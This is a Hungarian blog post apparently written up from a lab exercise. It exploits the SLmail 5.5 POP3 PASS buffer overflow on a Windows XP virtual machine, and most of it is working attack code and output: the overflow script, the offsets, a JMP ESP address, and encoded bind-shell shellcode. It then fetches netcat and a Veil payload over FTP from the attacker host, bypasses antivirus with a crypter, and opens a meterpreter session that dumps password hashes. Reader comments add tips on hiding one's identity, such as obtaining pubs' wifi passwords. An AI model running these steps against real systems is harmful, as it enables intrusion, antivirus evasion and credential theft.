2014. január 23., csütörtök
SLmail exploit
1st step: download this: http://www.offensive-security.com/pwbonline/extrabos.tar.gz
2nd step: install the SLmail application on the XP machine.
netstat -naob
Protokoll Helyi cím Idegen cím Állapot PID
TCP 0.0.0.0:25 0.0.0.0:0 FIGYEL 1944
[slsmtp.exe]
TCP 0.0.0.0:79 0.0.0.0:0 FIGYEL 2376
[SLmail.exe]
TCP 0.0.0.0:106 0.0.0.0:0 FIGYEL 2376
[SLmail.exe]
TCP 0.0.0.0:110 0.0.0.0:0 FIGYEL 2376
[SLmail.exe]
...
TCP 0.0.0.0:180 0.0.0.0:0 FIGYEL 1840
[SLadmin.exe]
...
TCP 127.0.0.1:8376 0.0.0.0:0 FIGYEL 2376
[SLmail.exe]
...
UDP 0.0.0.0:50 *:* 2376
[SLmail.exe]
UDP 0.0.0.0:54 *:* 2376
[SLmail.exe]
...
root@kali:~# unicornscan -mT 192.168.56.105
TCP open smtp[ 25] from 192.168.56.105 ttl 128
TCP open finger[ 79] from 192.168.56.105 ttl 128
TCP open 3com-tsmux[ 106] from 192.168.56.105 ttl 128
TCP open pop3[ 110] from 192.168.56.105 ttl 128
TCP open epmap[ 135] from 192.168.56.105 ttl 128
TCP open netbios-ssn[ 139] from 192.168.56.105 ttl 128
TCP open microsoft-ds[ 445] from 192.168.56.105 ttl 128
TCP open unknown[ 8081] from 192.168.56.105 ttl 128
root@kali:~# nmap -sV -A 192.168.56.105 -pT:25,79,106,110,180
25/tcp open smtp SLmail smtpd 5.5.0.4433
| smtp-commands: xxxxx-30298B2AD.com, SIZE 100000000, SEND, SOML, SAML, HELP, VRFY, EXPN, ETRN, XTRN,
|_ This server supports the following commands. HELO MAIL RCPT DATA RSET SEND SOML SAML HELP NOOP QUIT
79/tcp open finger SLMail fingerd
|_finger: Finger online user list request denied.
106/tcp open pop3pw SLMail pop3pw
110/tcp open pop3 BVRP Software SLMAIL pop3d
180/tcp open ris?
root@kali:~# nc 192.168.56.105 25
220 xxxxx-30298B2AD.com SMTP Server SLmail 5.5.0.4433 Ready ESMTP spoken here
HELO my
250 xxxxx-30298B2AD.com
HELP
214-This server supports the following commands.
214-HELO MAIL RCPT DATA RSET
214-SEND SOML SAML HELP NOOP
214 QUIT
QUIT
221 xxxxx-30298B2AD.com Service closing transmission channel
root@kali:~# nc 192.168.56.105 79
?
Unable to find specified user.
root@kali:~# nc 192.168.56.105 106
200 hello
help
500 protocol error
?
500 protocol error
quit
200 bye
root@kali:~# nc 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00005.988109@xxxxx-30298B2AD.com>
HELP
-ERR unknown command
?
-ERR unknown command
QUIT
+OK POP3 server xxxxx-30298B2AD.com signing off.
root@kali:~# nc 192.168.56.105 180
?
HELP
QUIT
^C
http://www.exploit-db.com/exploits/638/
root@kali:~# searchsploit slmail
Description Path
--------------------------------------------------------------------------- -------------------------
SLMail 5.5 POP3 PASS Buffer Overflow Exploit /windows/remote/638.py
SLMAIL 5.5 POP3 PASS - Remote Buffer Overflow Exploit /windows/remote/643.c
SLMail 5.5 - Remote Buffer Overflow Exploit /windows/remote/646.c
root@kali:~# cat slmail_buf.py
import sys
import struct
import socket
from time import sleep
# Crash reproducer for the SLmail POP3 PASS overflow discussed in this post:
# connect, print the banner, send a USER line, then a PASS line whose argument
# is an oversized run of 'A', printing each server reply. Invoked as
#   python slmail_buf.py <host> <port>
# The OllyDbg registers shown further down (EIP = 41414141) are what this
# script is meant to reproduce: the server does not bound the PASS argument.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = 'A' * 2000  # PASS argument; the post raises this to 5000 later on


def _read_reply():
    # Read one response (at most 1024 bytes) from the server and echo it.
    reply = s.recv(1024)
    print(reply)
    return reply


target = (sys.argv[1], int(sys.argv[2]))
s.connect(target)
data = _read_reply()  # greeting banner
for command in ('USER user', 'PASS ' + buffer):
    s.send(command + '\r\n')
    data = _read_reply()
s.close()
Attach OllyDbg to SLmail.exe.
root@kali:~# python slmail_buf.py 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00006.1554953@xxxxx-30298B2AD.com>
+OK user welcome here
-ERR unable to lock mailbox
buffer = 'A'*5000
root@kali:~# python slmail_buf.py 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00007.1647656@xxxxx-30298B2AD.com>
+OK user welcome here
^CTraceback (most recent call last):
File "slmail_buf.py", line 16, in <module>
data=s.recv(1024)
KeyboardInterrupt
ESP 01BFA154 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 41414141
EIP 41414141
root@kali:~# /usr/share/metasploit-framework/tools/pattern_create.rb 5000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3A...
buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa...
root@kali:~# python slmail_buf.py 192.168.56.105 110
ESP 01BFA154 ASCII "2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh
EBP 46307A46
EIP 7A46317A
root@kali:~# /usr/share/metasploit-framework/tools/pattern_offset.rb 7A46317A
[*] Exact match at offset 4654
root@kali:~# /usr/share/metasploit-framework/tools/pattern_offset.rb 2Fz3
[*] Exact match at offset 4658
In OllyDbg, search for a JMP ESP instruction:
7C91FCD8 FFE4 JMP ESP
root@kali:~# msfpayload windows/shell_bind_tcp RPORT=4444 R | msfencode -a x86 -b '\x00\x0a\x0d' -t python
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
buf = ""
buf += "\xdb\xd2\xb8\xb3\xb6\xb4\xe1\xd9\x74\x24\xf4\x5f\x2b"
buf += "\xc9\xb1\x56\x31\x47\x18\x03\x47\x18\x83\xc7\xb7\x54"
buf += "\x41\x1d\x5f\x11\xaa\xde\x9f\x42\x22\x3b\xae\x50\x50"
...
buffer = '\x41' * 4654 + '\xD8\xFC\x91\x7C' + '\x90'*32 + buf
root@kali:~# python slmail_buf.py 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00001.6738453@xxxxx-30298B2AD.com>
+OK user welcome here
root@kali:~# nc 192.168.56.105 4444
Microsoft Windows XP [verziószám: 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\SLmailSystem>
Next step: bypass the AV and escalate privileges. Note that the cmd.exe reached on port 4444 already runs as NT AUTHORITY\SYSTEM (see the AV log below), because the SLmail service itself runs as SYSTEM; a network-facing service running with that privilege is a finding on its own.
C:\Program Files\SLmail\System>tftp -i 192.168.56.101 GET nc.exe
tftp -i 192.168.56.101 GET nc.exe
A hozzáférés megtagadva.
AV log:
2014.01.24. 09:46:38 Blocked by Access Protection rule NT AUTHORITY\SYSTEM C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\tftp.exe Anti-virus Standard Protection:Prevent use of tftp.exe Action blocked : Read
C:\Program Files\SLmail\System>echo open 192.168.56.101 21> ftp.txt
echo open 192.168.56.101 21> ftp.txt
C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt
C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt
C:\Program Files\SLmail\System>echo bin>>ftp.txt
echo bin>>ftp.txt
C:\Program Files\SLmail\System>echo GET nc.exe>>ftp.txt
echo GET nc.exe>>ftp.txt
C:\Program Files\SLmail\System>echo bye>>ftp.txt
echo bye>>ftp.txt
C:\Program Files\SLmail\System>ftp -s:ftp.txt
ftp -s:ftp.txt
Felhasználó (192.168.56.101:(none)): open 192.168.56.101 21
bin
GET nc.exe
bye
C:\Program Files\SLmail\System>dir
dir
A meghajtóban (C) lévő kötet xp_system.
A kötet sorozatszáma: 6C1F-E27C
C:\Program Files\SLmail\System tartalma:
2014.01.24. 09:48 <DIR> .
2014.01.24. 09:48 <DIR> ..
2014.01.24. 09:47 56 ftp.txt
2002.11.19. 11:40 3 358 listrcrd.txt
2014.01.23. 09:24 1 898 maillog.000
2014.01.24. 00:00 51 104 maillog.001
2014.01.24. 09:33 6 141 maillog.txt
5 fájl 62 557 bájt
2 könyvtár 30 726 782 976 bájt szabad
C:\Program Files\SLmail\System>
AV log:
2014.01.24. 9:48:12 Deleted NT AUTHORITY\SYSTEM C:\WINDOWS\system32\ftp.exe C:\Program Files\SLmail\System\nc.exe Tool-NetCat (Potentially Unwanted Program)
Generate payload16.exe with Veil.
C:\Program Files\SLmail\System>echo open 192.168.56.101 21>ftp.txt
echo open 192.168.56.101 21>ftp.txt
C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt
C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt
C:\Program Files\SLmail\System>echo bin>>ftp.txt
echo bin>>ftp.txt
C:\Program Files\SLmail\System>echo GET payload16.exe>>ftp.txt
echo GET payload16.exe>>ftp.txt
C:\Program Files\SLmail\System>echo bye>>ftp.txt
echo bye>>ftp.txt
C:\Program Files\SLmail\System>ftp -s:ftp.txt
ftp -s:ftp.txt
Felhasználó (192.168.56.101:(none)): open 192.168.56.101 21
bin
GET payload16.exe
bye
C:\Program Files\SLmail\System>dir
dir
A meghajtóban (C) lévő kötet xp_system.
A kötet sorozatszáma: 6C1F-E27C
C:\Program Files\SLmail\System tartalma:
2014.01.24. 10:27 <DIR> .
2014.01.24. 10:27 <DIR> ..
2014.01.24. 10:27 63 ftp.txt
2002.11.19. 11:40 3 358 listrcrd.txt
2014.01.23. 09:24 1 898 maillog.000
2014.01.24. 00:00 51 104 maillog.001
2014.01.24. 10:03 6 309 maillog.txt
2014.01.24. 10:27 3 059 256 payload16.exe
6 fájl 3 121 988 bájt
2 könyvtár 30 723 756 032 bájt szabad
C:\Program Files\SLmail\System>
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.56.101
LHOST => 192.168.56.101
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.56.101:443
[*] Starting the payload handler...
C:\Program Files\SLmail\System>payload16.exe
payload16.exe
msf exploit(handler) >
[*] Sending stage (770048 bytes) to 192.168.56.105
[*] Meterpreter session 1 opened (192.168.56.101:443 -> 192.168.56.105:3089) at 2014-01-24 10:56:18 +0100
sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ xxxxx-30298B2AD 192.168.56.101:443 -> 192.168.56.105:3089 (192.168.56.105)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : xxxxx-30298B2AD
OS : Windows XP (Build 2600, Szervizcsomag 3).
Architecture : x86
System Language : hu_HU
Meterpreter : x86/win32
meterpreter >
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 4294967295
4 0 System x86 0 NT AUTHORITY\SYSTEM
188 2012 explorer.exe x86 0 xxxxx-30298B2AD\Admin C:\WINDOWS\Explorer.EXE
300 1600 cmd.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\cmd.exe
...
532 848 FrameworkService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\McAfee\Common Framework\FrameworkService.exe
580 848 VsTskMgr.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\McAfee\VirusScan Enterprise\VsTskMgr.exe
644 2476 McTray.exe x86 0 xxxxx-30298B2AD\Admin C:\Program Files\McAfee\Common Framework\McTray.exe
712 644 shstat.exe x86 0 xxxxx-30298B2AD\Admin C:\Program Files\McAfee\VirusScan Enterprise\SHSTAT.EXE
744 848 mdm.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
752 580 mfeann.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\McAfee\VirusScan Enterprise\mfeann.exe
...
C:\WINDOWS\system32\mfevtps.exe
976 3676 payload16.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SLmail\System\payload16.exe
...
1840 848 SLadmin.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SLadmin\SLadmin.exe
1944 848 SLSmtp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SLmail\slsmtp.exe
...
2100 300 nc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SLmail\System\nc.exe
2136 848 mcshield.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Common Files\McAfee\SystemCore\mcshield.exe
meterpreter >
I encrypted nc.exe too (with the Hyperion crypter):
root@kali:~/Hyperion-1.0# wine crypter.exe nc.exe nc_crypt.exe
Opening nc.exe
Copied file to memory: 0x117358
Found valid MZ signature
Found pointer to PE Header: 0xd8
Found valid PE signature
Found a PE32 file
Number of Data Directories: 16
Image Base: 0x400000
...
Starting FASM with the following parameters:
Commandline: Fasm\FASM.EXE Src\FasmContainer32\main.asm nc_crypt.exe
FASM Working Directory: Z:\root\Hyperion-1.0
Executing fasm.exe
The AV was bypassed.
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Admin:1022:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:::
ASPNET:1004:275b6f5ffbf7997723474a13bebfa08d:738da873863e137c2e75504e6a8b4ca5:::
Rendszergazda:1005:aad3b435b51404eeaad3b435b51404ee:6f3961367d2b4d1f55f14af59f34cd45:::
Segítségnyújtó:1021:b3c85a07a2fc61530574f646d69db64a:2e82f56f50cfaa7347b018126bcad628:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bf0859717440c82b18e3f5cb36db8211:::
user:1023:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Vendég:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter >
Game OVER.
Szia! Nagyon szuper blog!
Privátban szeretnék tőled egy kis segítséget kérni C# programozásban. :-)
email:jack-spaero[@]freemail.hu
Ezzel vége a TOR-nak:
http://pcforum.hu/hirek/15785/Megszerezte+az+FBI+az+osszes+a+Tor-on+keresztul+elkuldott+levelet.html
http://pcforum.hu/hirek/15313/Konnyuszerrel+azonosithatok+a+Tor-t+hasznalo+internetezok.html
1. IP-cím elrejtésére a TOR mellett számos más lehetőség van.
2. nyilvános netkávézó vagy publikus WiFi, esetleg eldobható mobil stick + TOR és ... sok sikert a beazonosítási kísérletekhez...
3. anonim e-mail küldésére vannak más szolgáltatások, amiket direkt erre hoztak létre...
4. TOR-t általában azért használ valaki, hogy : a FORRÁS oldalon rejtse a forgalmat. A CÉL oldalon történő rejtőzéshez vannak ettől jobb módszerek.
Magyarul a TOR arra való, hogy az ISP-d ne lássa, hogy mit csinálsz, milyen oldalakat látogatsz stb. A privát VPN-ek is erre valók. Ahhoz, hogy a cél oldalon ne lehessen lenyomozni a forrást, nem a TOR a legjobb, hanem az ellenőrizhetetlen források alkalmazása (nyilvános wifi-k használata, kocsmák wifi jelszavának megszerzése, anonim proxy-kkal való kombinálása, satöbbi...)